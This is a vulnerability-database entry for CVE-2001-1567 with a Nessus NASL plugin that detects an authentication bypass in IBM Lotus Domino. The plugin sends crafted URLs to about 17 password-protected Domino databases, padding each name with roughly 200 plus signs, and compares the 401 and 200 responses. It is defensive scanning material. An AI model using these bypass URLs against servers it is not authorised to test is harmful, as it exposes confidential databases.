CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS
Percentile
56.3%
By creating a specially crafted URL, the authentication mechanism of the Domino database can be circumvented. These URLs should look like :
http://host.com/<databasename>.ntf<buff>.nsf/
in which <buff> has a certain length.
#%NASL_MIN_LEVEL 70300
#
# This script was written by Davy Van De Moere - CISSP ([email protected])
# See the Nessus Scripts License for details
#
# Script audit and contributions from Carmichael Security
# Erik Anderson <[email protected]> (nb: this domain no longer exists)
# Added BugtraqID
#
# Credits go to: Gabriel A. Maggiotti (for posting this bug on qb0x.net), and
# to Javier Fernandez-Sanguino Pena (for the look-a-like nessus script, which
# checks for anonymously accessible databases.)
# Modified by Erik Anderson <[email protected]>
# Changes by Tenable:
# - Revised plugin title (9/5/09)
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(10953);
script_version("1.35");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2001-1567");
script_bugtraq_id(4022);
script_name(english:"IBM Lotus Domino Crafted .nsf Request Authentication Bypass");
script_set_attribute(attribute:"synopsis", value:
"A web application on the remote host has an authentication
bypass vulnerability.");
script_set_attribute(attribute:"description", value:
"By creating a specially crafted URL, the authentication mechanism of
the Domino database can be circumvented. These URLs should look like :
http://host.com/<databasename>.ntf<buff>.nsf/
in which <buff> has a certain length.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/30");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Feb/33");
script_set_attribute(attribute:"solution", value:
"Upgrade to the latest version of Domino.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2002/02/03");
script_set_attribute(attribute:"plugin_publication_date", value:"2002/05/12");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:lotus_domino");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Web Servers");
script_copyright(english:"This script is Copyright (C) 2002-2022 Davy Van De Moere");
script_dependencies("find_service1.nasl", "http_version.nasl", "www_fingerprinting_hmap.nasl");
script_require_ports("Services/www", 80);
exit(0);
}
#
# The script code starts here
#
include("http_func.inc");
include("http_keepalive.inc");
port = get_http_port(default:80, embedded:TRUE);
sig = get_http_banner(port:port);
if ( sig && "Lotus Domino" >!< sig && "Lotus-Domino" >!< sig ) exit(0);
report = string("These databases require a password, but this authentication\ncan be circumvented by supplying a long buffer in front of their name :\n");
vuln = 0;
dead = 0;
function test_cgi(port, db, db_bypass)
{
local_var Forbidden, passed, r;
if ( dead ) return 0;
Forbidden = 0;
r = http_keepalive_send_recv(port:port, data:http_get(item:db, port:port));
if( isnull(r) ) {
dead = 1;
return 0;
}
if(ereg(string:r, pattern:"^HTTP/[0-9]\.[0-9] 401 .*"))
{
Forbidden = 1;
}
passed = 0;
r = http_keepalive_send_recv(port:port, data:http_get(item:db_bypass, port:port));
if( isnull(r) ) {
dead = 1;
return 0;
}
if(ereg(string:r, pattern:"^HTTP/[0-9]\.[0-9] 200 .*"))passed = 1;
if((Forbidden == 1) && (passed == 1))
{
report = string(report, db, "\n");
vuln = vuln + 1;
}
return(0);
}
test_cgi(port:port,
db:"/log.nsf",
db_bypass:string("/log.ntf",crap(length:206,data:"+"),".nsf"));
test_cgi(port:port,
db:"/setup.nsf",
db_bypass:string("/setup.ntf",crap(length:204,data:"+"),".nsf"));
test_cgi(port:port,
db:"/names.nsf",
db_bypass:string("/names.ntf",crap(length:204,data:"+"),".nsf"));
test_cgi(port:port,
db:"/statrep.nsf",
db_bypass:string("/statrep.ntf",crap(length:202,data:"+"),".nsf"));
test_cgi(port:port,
db:"/catalog.nsf",
db_bypass:string("/catalog.ntf",crap(length:202,data:"+"),".nsf"));
test_cgi(port:port,
db:"/domlog.nsf",
db_bypass:string("/domlog.ntf",crap(length:203,data:"+"),".nsf"));
test_cgi(port:port,
db:"/webadmin.nsf",
db_bypass:string("/webadmin.ntf",crap(length:201,data:"+"),".nsf"));
test_cgi(port:port,
db:"/cersvr.nsf",
db_bypass:string("/cersvr.ntf",crap(length:203,data:"+"),".nsf"));
test_cgi(port:port,
db:"/events4.nsf",
db_bypass:string("/events4.ntf",crap(length:202,data:"+"),".nsf"));
test_cgi(port:port,
db:"/mab.nsf",
db_bypass:string("/mab.ntf",crap(length:206,data:"+"),".nsf"));
test_cgi(port:port,
db:"/ntsync4.nsf",
db_bypass:string("/ntsync4.ntf",crap(length:202,data:"+"),".nsf"));
test_cgi(port:port,
db:"/collect4.nsf",
db_bypass:string("/collect4.ntf",crap(length:201,data:"+"),".nsf"));
test_cgi(port:port,
db:"/mailw46.nsf",
db_bypass:string("/mailw46.ntf",crap(length:202,data:"+"),".nsf"));
test_cgi(port:port,
db:"/bookmark.nsf",
db_bypass:string("/bookmark.ntf",crap(length:201,data:"+"),".nsf"));
test_cgi(port:port,
db:"/agentrunner.nsf",
db_bypass:string("/agentrunner.ntf",crap(length:198,data:"+"),".nsf"));
test_cgi(port:port,
db:"/mail.box",
db_bypass:string("/mailbox.ntf",crap(length:202,data:"+"),".nsf"));
test_cgi(port:port,
db:"/admin4.nsf",
db_bypass:string("/admin4.ntf",crap(length:203,data:"+"),".nsf"));
if(vuln)
{
security_warning(port:port, extra:string(report,"\n This is a severe risk,
as an attacker is able to access \n most of the authentication protected
databases. As such, \nconfidential information can be looked into and
\nconfigurations can mostly be altered. "));
}